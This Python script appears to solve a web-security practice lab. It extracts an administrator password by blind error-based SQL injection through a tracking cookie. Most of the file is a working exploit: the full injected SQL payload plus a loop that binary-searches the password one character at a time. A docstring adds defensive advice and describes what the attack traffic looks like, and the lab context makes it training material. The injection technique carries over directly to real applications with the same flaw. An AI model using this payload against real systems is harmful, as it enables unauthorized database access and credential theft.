#!/usr/bin/env python3
# coding: utf-8
import requests

# Product-filter endpoint of the practice-lab instance; the probe requests in
# this script are all sent to this address.
url = (
	"https://acee1f8a1f88d24480a65915007d005b.web-security-academy.net"
	"/filter?category=Accessories"
)


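def exp_password():
	"""Recover the lab's administrator password one character at a time.

	Each request carries a ``TrackingId`` cookie with a SQL fragment appended.
	The fragment evaluates ``to_char(1/0)`` (a divide-by-zero) only when the
	ASCII code of the character at position ``i`` of ``password`` is greater
	than ``mid``. A response containing "Internal Server Error" therefore
	answers "greater than mid"; any other response answers "not greater".
	A binary search over the codes 32..127 turns those one-bit answers into
	one character per position, for positions 1 through 49.

	The progress string is printed after every position; nothing is returned.
	If no probe for a position produces the error, the search settles on 32
	and a space is appended for that position.

	Defensive reading: the probe depends on two things, the cookie value
	reaching a SQL statement unparameterized (inferred from the payload shape;
	the server code is not visible here) and a database error being
	distinguishable from a normal page. Binding the cookie as a query
	parameter removes the first; returning one generic response for handled
	and unhandled errors removes the second. On the detection side, the
	traffic is a long run of requests in one session whose ``TrackingId``
	contains quotes, ``||`` and ``select``.

	Raises:
		requests.exceptions.RequestException: on connection failure or when
			a request exceeds the timeout.
	"""
	recovered = []
	# Session values copied from one lab instance; presumably they have to be
	# refreshed for a new instance (TODO confirm).
	cookies_dic = {
		"TrackingId": "UMq6OTsVojf6P8L7",
		"session": "I7OpYfiPxgLyNUboj2rI0DyF6eoFr3i7"
	}
	for i in range(1, 50):
		# Search window of candidate ASCII codes for this position.
		low, high = 32, 127
		while low < high:
			mid = (low + high) // 2
			cookies_dic[
				"TrackingId"
			] = f"UMq6OTsVojf6P8L7'||(select case when ascii(substr(password,{i},1))>{mid} then to_char(1/0) else '' end from users where username='administrator')||'"
			# Without a timeout a stalled connection would block the script
			# indefinitely; fail with an exception instead.
			resp = requests.get(url=url, cookies=cookies_dic, timeout=10)
			if "Internal Server Error" in resp.text:
				# Error page returned: the character code is > mid.
				low = mid + 1
			else:
				# Normal page returned: the character code is <= mid.
				high = mid
		# low == high here, which is the code the search converged on.
		recovered.append(chr(low))
		print("".join(recovered))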
		
# Run the extraction only when this file is executed as a script, not when it
# is imported as a module.
if __name__ == "__main__":
	exp_password()